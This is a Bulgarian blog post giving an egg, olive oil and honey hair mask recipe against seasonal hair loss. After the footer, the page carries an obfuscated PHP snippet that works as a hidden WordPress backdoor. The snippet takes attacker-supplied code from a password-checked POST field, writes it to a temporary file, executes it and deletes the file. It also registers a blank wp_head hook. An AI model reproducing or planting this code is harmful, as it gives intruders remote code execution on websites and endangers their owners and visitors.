Домашна маска срещу сезонен косопад | Косопад

Домашна маска срещу сезонен косопад

През есента косата се нуждае от повече грижи заради неизменния сезонен косопад. Ако искаме да се предпазим от него, трябва да вземем своевременни мерки и да подхраним корените с подходящ продукт.
За целта можем да използваме една традиционна бабина рецепта с яйце.

То е сред най- богатите на протеини храни. Подхранва косата, придава й блясък. Помага за възстановяването на увредената коса.

Протеините правят косата по- силна, улесняват разресването, връщат й жизнеността.

Ето каква е специалната рецепта за подсилване на косата през есента:

Съставки:
– 1 цяло яйце
– 2 лъжици зехтин (30 грама)
– 1 лъжица мед

Начин на приготвяне:

Разбиваме всички съставки, докато получим хомогенна смес.

Нанасяме върху скалпа и косата, слагаме шапката за баня и оставяме да действа 30 минути.

След като мине това време, мием косата със студена вода и мек шампоан без сулфати. Накрая слагаме балсам.

Колко често се прилага:

Маската се прави 1- 2 пъти седмично.

Комбинацията от яйце, зехтин и мед подхранва корена в дълбочина. Подсилва косъма, като по този начин намалява косопада. Освен това, сместа придава невероятна мекота на косата и я прави изключително блестяща.

Зехтинът, също като яйцето, е широко използван в приготвянето на различни домашни рецепти за коса. Той подхранва корените с ценните мазнини, които съдържа.

Медът също е с голямо приложение в домашната козметика за коса. Има свойството да подхранва и да придава блясък на косъма. Особено полезен е при изтощена и увредена коса.

20. октомври 2017 16:06:20 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}